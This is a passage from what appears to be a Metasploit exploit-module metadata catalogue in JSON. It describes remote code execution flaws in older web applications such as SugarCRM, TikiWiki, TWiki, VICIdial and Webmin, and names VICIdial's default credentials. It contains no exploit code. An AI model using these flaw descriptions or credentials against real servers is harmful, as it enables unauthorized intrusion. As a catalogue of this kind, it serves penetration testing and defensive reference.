"disclosure_date": "2015-02-11",
"type": "exploit",
"author": [
"John Lightsey"
],
"description": "This module exploits a serialization flaw in MovableType before 5.2.12 to execute\n arbitrary code. The default nondestructive mode depends on the target server having\n the Object::MultiType and DateTime Perl modules installed in Perl's @INC paths.\n The destructive mode of operation uses only required MovableType dependencies,\n but it will noticeably corrupt the MovableType installation.",
"references": [
"CVE-2015-1592",
"URL-https://movabletype.org/news/2015/02/movable_type_607_and_5212_released_to_close_security_vulnera.html"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/sixapart_movabletype_storable_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/skybluecanvas_exec": {
"name": "SkyBlueCanvas CMS Remote Code Execution",
"full_name": "exploit/unix/webapp/skybluecanvas_exec",
"rank": 600,
"disclosure_date": "2014-01-28",
"type": "exploit",
"author": [
"Scott Parish",
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits an arbitrary command execution vulnerability\n in SkyBlueCanvas CMS version 1.1 r248-03 and below.",
"references": [
"CVE-2014-1683",
"OSVDB-102586",
"BID-65129",
"EDB-31183",
"PACKETSTORM-124948"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"SkyBlueCanvas 1.1 r248"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/skybluecanvas_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/skybluecanvas_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/sphpblog_file_upload": {
"name": "Simple PHP Blog Remote Command Execution",
"full_name": "exploit/unix/webapp/sphpblog_file_upload",
"rank": 600,
"disclosure_date": "2005-08-25",
"type": "exploit",
"author": [
"Matteo Cantoni <goony@nothink.org>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module combines three separate issues within The Simple PHP Blog (<= 0.4.0)\n application to upload arbitrary data and thus execute a shell. The first\n vulnerability exposes the hash file (password.txt) to unauthenticated users.\n The second vulnerability lies within the image upload system provided to\n logged-in users; there is no image validation function in the blogger to\n prevent an authenticated user from uploading any file type. The third\n vulnerability occurs within the blog comment functionality, allowing\n arbitrary files to be deleted.",
"references": [
"CVE-2005-2733",
"OSVDB-19012",
"BID-14667",
"EDB-1191"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/unix/webapp/sphpblog_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/sphpblog_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/spip_connect_exec": {
"name": "SPIP connect Parameter PHP Injection",
"full_name": "exploit/unix/webapp/spip_connect_exec",
"rank": 600,
"disclosure_date": "2012-07-04",
"type": "exploit",
"author": [
"Arnaud Pachot",
"Frederic Cikala",
"Davy Douhine"
],
"description": "This module exploits a PHP code injection in SPIP. The vulnerability exists in the\n connect parameter and allows an unauthenticated user to execute arbitrary commands\n with web user privileges. Branches 2.0, 2.1 and 3 are affected. Vulnerable versions\n are <2.0.21, <2.1.16 and < 3.0.3, but this module works only against branch 2.0 and\n has been tested successfully with SPIP 2.0.11 and SPIP 2.0.20 with Apache on Ubuntu\n and Fedora Linux distributions.",
"references": [
"OSVDB-83543",
"BID-54292",
"URL-http://contrib.spip.net/SPIP-3-0-3-2-1-16-et-2-0-21-a-l-etape-303-epate-la"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/unix/webapp/spip_connect_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/spip_connect_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/squash_yaml_exec": {
"name": "Squash YAML Code Execution",
"full_name": "exploit/unix/webapp/squash_yaml_exec",
"rank": 600,
"disclosure_date": "2013-08-06",
"type": "exploit",
"author": [
"Charlie Eriksen"
],
"description": "This module exploits a remote code execution vulnerability in the\n YAML request processor of the Squash application.",
"references": [
"URL-http://ceriksen.com/2013/08/06/squash-remote-code-execution-vulnerability-advisory/",
"OSVDB-95992",
"CVE-2013-5036"
],
"platform": "Ruby",
"arch": "ruby",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/squash_yaml_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/squash_yaml_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/squirrelmail_pgp_plugin": {
"name": "SquirrelMail PGP Plugin Command Execution (SMTP)",
"full_name": "exploit/unix/webapp/squirrelmail_pgp_plugin",
"rank": 0,
"disclosure_date": "2007-07-09",
"type": "exploit",
"author": [
"Nicob <nicob@nicob.net>"
],
"description": "This module exploits a command execution vulnerability in the\n PGP plugin of SquirrelMail. This flaw was found while quickly\n grepping the code after release of some information at\n http://www.wslabi.com/. Later, iDefense published an advisory ....\n\n Reading an email in SquirrelMail with the PGP plugin activated\n is enough to compromise the underlying server.\n\n Only \"cmd/unix/generic\" payloads were tested.",
"references": [
"CVE-2003-0990",
"OSVDB-3178",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=330",
"URL-http://www.wslabi.com/wabisabilabi/initPublishedBid.do?"
],
"platform": "Unix",
"arch": "cmd",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": [
"SquirrelMail PGP plugin < 2.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb",
"is_install_path": true,
"ref_name": "unix/webapp/squirrelmail_pgp_plugin",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/sugarcrm_rest_unserialize_exec": {
"name": "SugarCRM REST Unserialize PHP Code Execution",
"full_name": "exploit/unix/webapp/sugarcrm_rest_unserialize_exec",
"rank": 600,
"disclosure_date": "2016-06-23",
"type": "exploit",
"author": [
"EgiX"
],
"description": "This module exploits a PHP Object Injection vulnerability in SugarCRM CE <= 6.5.23\n which could be abused to allow unauthenticated users to execute arbitrary PHP code with\n the permissions of the webserver. The dangerous unserialize() call exists in the\n '/service/core/REST/SugarRestSerialize.php' script. The exploit abuses the __destruct()\n method from the SugarCacheFile class to write arbitrary PHP code into the /custom directory.",
"references": [
"URL-http://karmainsecurity.com/KIS-2016-07",
"URL-http://www.sugarcrm.com/security/sugarcrm-sa-2016-001",
"URL-http://www.sugarcrm.com/security/sugarcrm-sa-2016-008",
"URL-https://bugs.php.net/bug.php?id=72663"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"SugarCRM CE <= 6.5.23"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/sugarcrm_rest_unserialize_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/sugarcrm_rest_unserialize_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/sugarcrm_unserialize_exec": {
"name": "SugarCRM unserialize() PHP Code Execution",
"full_name": "exploit/unix/webapp/sugarcrm_unserialize_exec",
"rank": 600,
"disclosure_date": "2012-06-23",
"type": "exploit",
"author": [
"EgiX",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a php unserialize() vulnerability in SugarCRM <= 6.3.1\n which could be abused to allow authenticated SugarCRM users to execute arbitrary\n code with the permissions of the webserver.\n\n The dangerous unserialize() exists in the 'include/MVC/View/views/view.list.php'\n script, which is called with user controlled data from the 'current_query_by_page'\n parameter. The exploit abuses the __destruct() method from the SugarTheme class\n to write arbitrary PHP code to a 'pathCache.php' on the web root.",
"references": [
"CVE-2012-0694",
"OSVDB-83361",
"EDB-19381",
"URL-http://www.sugarcrm.com/forums/f22/critical-security-vulnerability-76537/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/sugarcrm_unserialize_exec",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/tikiwiki_graph_formula_exec": {
"name": "TikiWiki tiki-graph_formula Remote PHP Code Execution",
"full_name": "exploit/unix/webapp/tikiwiki_graph_formula_exec",
"rank": 600,
"disclosure_date": "2007-10-10",
"type": "exploit",
"author": [
"Matteo Cantoni <goony@nothink.org>",
"jduck <jduck@metasploit.com>"
],
"description": "TikiWiki (<= 1.9.8) contains a flaw that may allow a remote\n attacker to execute arbitrary PHP code. The issue is due to\n 'tiki-graph_formula.php' script not properly sanitizing user\n input supplied to create_function(), which may allow a remote\n attacker to execute arbitrary PHP code resulting in a loss of\n integrity.",
"references": [
"CVE-2007-5423",
"OSVDB-40478",
"BID-26006"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/tikiwiki_graph_formula_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/tikiwiki_jhot_exec": {
"name": "TikiWiki jhot Remote Command Execution",
"full_name": "exploit/unix/webapp/tikiwiki_jhot_exec",
"rank": 600,
"disclosure_date": "2006-09-02",
"type": "exploit",
"author": [
"Matteo Cantoni <goony@nothink.org>"
],
"description": "TikiWiki contains a flaw that may allow a malicious user to execute\n arbitrary PHP code. The issue is triggered due to the jhot.php script\n not correctly verifying uploaded files. It is possible that the flaw\n may allow arbitrary PHP code execution by uploading a malicious PHP\n script resulting in a loss of integrity.\n\n The vulnerability was reported in Tikiwiki version 1.9.4.",
"references": [
"CVE-2006-4602",
"OSVDB-28456",
"BID-19819",
"URL-http://secunia.com/advisories/21733/"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/tikiwiki_jhot_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/tikiwiki_unserialize_exec": {
"name": "Tiki Wiki unserialize() PHP Code Execution",
"full_name": "exploit/unix/webapp/tikiwiki_unserialize_exec",
"rank": 600,
"disclosure_date": "2012-07-04",
"type": "exploit",
"author": [
"EgiX",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a php unserialize() vulnerability in Tiki Wiki <= 8.3\n which could be abused to allow unauthenticated users to execute arbitrary code\n under the context of the webserver user.\n\n The dangerous unserialize() exists in the 'tiki-print_multi_pages.php' script,\n which is called with user controlled data from the 'printpages' parameter.\n The exploit abuses the __destruct() method from the Zend_Pdf_ElementFactory_Proxy\n class to write arbitrary PHP code to a file on the Tiki Wiki web directory.\n\n In order to run successfully, three conditions must be satisfied: (1) the display_errors\n php setting must be On to disclose the filesystem path of Tiki Wiki, (2) the Tiki\n Wiki Multiprint feature must be enabled to reach the unserialize() call, and (3) a php\n version older than 5.3.4 must be used to allow poison null bytes in filesystem related\n functions. The exploit has been tested successfully on Ubuntu 9.10 and Tiki Wiki 8.3.",
"references": [
"CVE-2012-0911",
"OSVDB-83534",
"BID-54298",
"EDB-19573",
"URL-http://dev.tiki.org/item4109"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/tikiwiki_unserialize_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/tikiwiki_upload_exec": {
"name": "Tiki Wiki Unauthenticated File Upload Vulnerability",
"full_name": "exploit/unix/webapp/tikiwiki_upload_exec",
"rank": 600,
"disclosure_date": "2016-07-11",
"type": "exploit",
"author": [
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits a file upload vulnerability in Tiki Wiki <= 15.1\n which could be abused to allow unauthenticated users to execute arbitrary code\n under the context of the web server user.\n\n The issue lies in one of the third-party components, ELFinder\n (version 2.0). This component ships with a default example page which\n demonstrates file operations such as upload, remove, rename, create directory etc.\n The default configuration does not enforce validations such as file extension, content-type etc.\n Thus, an unauthenticated user can upload a PHP file.\n\n The exploit has been tested on Debian 8.x 64-bit and Tiki Wiki 15.1.",
"references": [
"URL-https://www.mehmetince.net/exploit/tiki-wiki-unauthenticated-file-upload-vulnerability",
"URL-https://tiki.org/article434-Security-update-Tiki-15-2-Tiki-14-4-and-Tiki-12-9-released"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/unix/webapp/tikiwiki_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/tikiwiki_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/trixbox_langchoice": {
"name": "Trixbox langChoice PHP Local File Inclusion",
"full_name": "exploit/unix/webapp/trixbox_langchoice",
"rank": 0,
"disclosure_date": "2008-07-09",
"type": "exploit",
"author": [
"chao-mu"
],
"description": "This module injects php into the trixbox session file and then, in a second call, evaluates\n that code by manipulating the langChoice parameter as described in OSVDB-50421.",
"references": [
"OSVDB-50421",
"CVE-2008-6825",
"BID-30135",
"EDB-6026",
"URL-http://www.trixbox.org/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"trixbox CE 2.6.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/trixbox_langchoice.rb",
"is_install_path": true,
"ref_name": "unix/webapp/trixbox_langchoice",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/tuleap_rest_unserialize_exec": {
"name": "Tuleap 9.6 Second-Order PHP Object Injection",
"full_name": "exploit/unix/webapp/tuleap_rest_unserialize_exec",
"rank": 600,
"disclosure_date": "2017-10-23",
"type": "exploit",
"author": [
"EgiX"
],
"description": "This module exploits a Second-Order PHP Object Injection vulnerability in Tuleap <= 9.6 which\n could be abused by authenticated users to execute arbitrary PHP code with the permissions of the\n webserver. The vulnerability exists because the User::getRecentElements() method uses the\n unserialize() function with data that can be arbitrarily manipulated by a user through the REST\n API interface. The exploit's POP chain abuses the __toString() method from the Mustache class\n to reach a call to eval() in the Transition_PostActionSubFactory::fetchPostActions() method.",
"references": [
"URL-http://karmainsecurity.com/KIS-2017-02",
"URL-https://tuleap.net/plugins/tracker/?aid=10118",
"CVE-2017-7411"
],
"platform": "PHP",
"arch": "php",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Tuleap <= 9.6"
],
"mod_time": "2017-12-18 03:15:33 +0000",
"path": "/modules/exploits/unix/webapp/tuleap_rest_unserialize_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/tuleap_rest_unserialize_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/tuleap_unserialize_exec": {
"name": "Tuleap PHP Unserialize Code Execution",
"full_name": "exploit/unix/webapp/tuleap_unserialize_exec",
"rank": 600,
"disclosure_date": "2014-11-27",
"type": "exploit",
"author": [
"EgiX"
],
"description": "This module exploits a PHP object injection vulnerability in Tuleap <= 7.6-4 which could be\n abused to allow authenticated users to execute arbitrary code with the permissions of the\n web server. The dangerous unserialize() call exists in the 'src/www/project/register.php'\n file. The exploit abuses the destructor method from the Jabbex class in order to reach a\n call_user_func_array() call in the Jabber class and call the fetchPostActions() method from\n the Transition_PostAction_FieldFactory class to execute PHP code through an eval() call. In\n order to work, the target must have the 'sys_create_project_in_one_step' option disabled.",
"references": [
"CVE-2014-8791",
"URL-http://karmainsecurity.com/KIS-2014-13",
"URL-https://tuleap.net/plugins/tracker/?aid=7601"
],
"platform": "PHP",
"arch": "php",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)"
],
"mod_time": "2017-12-20 13:10:42 +0000",
"path": "/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/tuleap_unserialize_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/twiki_history": {
"name": "TWiki History TWikiUsers rev Parameter Command Execution",
"full_name": "exploit/unix/webapp/twiki_history",
"rank": 600,
"disclosure_date": "2005-09-14",
"type": "exploit",
"author": [
"B4dP4nd4",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a vulnerability in the history component of TWiki.\n By passing a 'rev' parameter containing shell metacharacters to the TWikiUsers\n script, an attacker can execute arbitrary OS commands.",
"references": [
"CVE-2005-2877",
"OSVDB-19403",
"BID-14834",
"URL-http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/twiki_history.rb",
"is_install_path": true,
"ref_name": "unix/webapp/twiki_history",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/twiki_maketext": {
"name": "TWiki MAKETEXT Remote Command Execution",
"full_name": "exploit/unix/webapp/twiki_maketext",
"rank": 600,
"disclosure_date": "2012-12-15",
"type": "exploit",
"author": [
"George Clark",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in the MAKETEXT Twiki variable. By using a\n specially crafted MAKETEXT, a malicious user can execute shell commands since user\n input is passed to the Perl \"eval\" command without first being sanitized. The\n problem is caused by an underlying security issue in the CPAN:Locale::Maketext\n module. This works in TWiki sites that have user interface localization enabled\n (UserInterfaceInternationalisation variable set).\n\n If USERNAME and PASSWORD aren't provided, anonymous access will be tried. Also,\n if the 'TwikiPage' option isn't provided, the module will try to create a random\n page on the SandBox space. The module has been tested successfully on\n TWiki 5.1.2 as distributed with the official TWiki-VM-5.1.2-1 virtual machine.",
"references": [
"CVE-2012-6329",
"OSVDB-88460",
"BID-56950",
"URL-http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2012-6329"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/unix/webapp/twiki_maketext.rb",
"is_install_path": true,
"ref_name": "unix/webapp/twiki_maketext",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/twiki_search": {
"name": "TWiki Search Function Arbitrary Command Execution",
"full_name": "exploit/unix/webapp/twiki_search",
"rank": 600,
"disclosure_date": "2004-10-01",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a vulnerability in the search component of TWiki.\n By passing a 'search' parameter containing shell metacharacters to the\n 'WebSearch' script, an attacker can execute arbitrary OS commands.",
"references": [
"CVE-2004-1037",
"OSVDB-11714",
"BID-11674",
"URL-http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/twiki_search.rb",
"is_install_path": true,
"ref_name": "unix/webapp/twiki_search",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/vbulletin_vote_sqli_exec": {
"name": "vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection",
"full_name": "exploit/unix/webapp/vbulletin_vote_sqli_exec",
"rank": 600,
"disclosure_date": "2013-03-25",
"type": "exploit",
"author": [
"Orestis Kourides",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a SQL injection vulnerability found in vBulletin 5 that has\n been used in the wild since March 2013. This module uses the SQL injection to extract the\n web application's usernames and hashes. With the retrieved information, it tries to\n log into the admin control panel in order to deploy the PHP payload. This module\n has been tested successfully on vBulletin Version 5.0.0 Beta 13 over an Ubuntu\n Linux distribution.",
"references": [
"CVE-2013-3522",
"OSVDB-92031",
"EDB-24882",
"BID-58754",
"URL-http://www.zempirians.com/archive/legion/vbulletin_5.pl.txt"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"vBulletin 5.0.0 Beta 11-28"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/vbulletin_vote_sqli_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/vicidial_manager_send_cmd_exec": {
"name": "VICIdial Manager Send OS Command Injection",
"full_name": "exploit/unix/webapp/vicidial_manager_send_cmd_exec",
"rank": 600,
"disclosure_date": "2013-10-23",
"type": "exploit",
"author": [
"Adam Caudill <adam@adamcaudill.com>",
"AverageSecurityGuy <stephen@averagesecurityguy.info>",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "The file agc/manager_send.php in the VICIdial web application uses\n unsanitized user input as part of a command that is executed using the PHP\n passthru() function. A valid username, password and session are needed to access\n the injection point. Fortunately, VICIdial has two built-in accounts with default\n passwords and the manager_send.php file has a SQL injection vulnerability that can\n be used to bypass the session check as long as at least one session has been\n created at some point in time. In case there isn't any valid session, the user can\n provide astGUIcient credentials in order to create one. The results of the injected\n commands are returned as part of the response from the web server. Affected versions\n include 2.7RC1, 2.7, and 2.8-403a. Other versions are likely affected as well. The\n default credentials used by Vicidial are VDCL/donotedit and VDAD/donotedit.",
"references": [
"CVE-2013-4467",
"CVE-2013-4468",
"OSVDB-98903",
"OSVDB-98902",
"BID-63340",
"BID-63288",
"URL-http://www.openwall.com/lists/oss-security/2013/10/23/10",
"URL-http://adamcaudill.com/2013/10/23/vicidial-multiple-vulnerabilities/"
],
"platform": "Unix",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"CMD"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/vicidial_manager_send_cmd_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/webapp/vicidial_user_authorization_unauth_cmd_exec": {
"name": "VICIdial user_authorization Unauthenticated Command Execution",
"full_name": "exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec",
"rank": 600,
"disclosure_date": "2017-05-26",
"type": "exploit",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a vulnerability in VICIdial versions\n 2.9 RC 1 to 2.13 RC1 which allows unauthenticated users\n to execute arbitrary operating system commands as the web\n server user if password encryption is enabled (disabled\n by default).\n\n When password encryption is enabled the user's password\n supplied using HTTP basic authentication is used in a call\n to exec().\n\n This module has been tested successfully on version 2.11 RC2\n and 2.13 RC1 on CentOS.",
"references": [
"URL-http://www.vicidial.org/VICIDIALmantis/view.php?id=1016"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/vicidial_user_authorization_unauth_cmd_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/webmin_show_cgi_exec": {
"name": "Webmin /file/show.cgi Remote Command Execution",
"full_name": "exploit/unix/webapp/webmin_show_cgi_exec",
"rank": 600,
"disclosure_date": "2012-09-06",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an arbitrary command execution vulnerability in Webmin\n 1.580. The vulnerability exists in the /file/show.cgi component and allows an\n authenticated user, with access to the File Manager Module, to execute arbitrary\n commands with root privileges. The module has been tested successfully with Webmin\n 1.580 over Ubuntu 10.04.",
"references": [
"OSVDB-85248",
"BID-55446",
"CVE-2012-2982",
"URL-http://www.americaninfosec.com/research/dossiers/AISG-12-001.pdf",
"URL-https://github.com/webmin/webmin/commit/1f1411fe7404ec3ac03e803cfa7e01515e71a213"
],
"platform": "Unix",
"arch": "cmd",
"rport": 10000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Webmin 1.580"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/webmin_show_cgi_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/webmin_upload_exec": {
"name": "Webmin Upload Authenticated RCE",
"full_name": "exploit/unix/webapp/webmin_upload_exec",
"rank": 600,
"disclosure_date": "2019-01-17",
"type": "exploit",
"author": [
"AkkuS <Özkan Mustafa Akkuş>",
"Ziconius <Kris.Anderson@immersivelabs.com>"
],
"description": "This module exploits an arbitrary command execution vulnerability in Webmin\n 1.900 and lower versions. Any user authorized to the \"Upload and Download\"\n module can execute arbitrary commands with root privileges.\n\n In addition, if the 'Running Processes' (proc) privilege is set the user can\n accurately determine which directory to upload to. Webmin application files\n can be written/overwritten, which allows remote code execution. The module\n has been tested successfully with Webmin 1.900 on Ubuntu v18.04.\n\n Using GUESSUPLOAD attempts to use a default installation path in order to\n trigger the exploit.",
"references": [
"CVE-2019-9624",
"EDB-46201",
"URL-https://pentest.com.tr/exploits/Webmin-1900-Remote-Command-Execution.html"
],
"platform": "Unix",
"arch": "cmd",
"rport": 10000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Webmin <= 1.900"
],
"mod_time": "2019-03-21 11:28:45 +0000",
"path": "/modules/exploits/unix/webapp/webmin_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/webmin_upload_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/webtester_exec": {
"name": "WebTester 5.x Command Execution",
"full_name": "exploit/unix/webapp/webtester_exec",
"rank": 600,
"disclosure_date": "2013-10-17",
"type": "exploit",
"author": [
"bcoles <bcoles@gmail.com>"
],
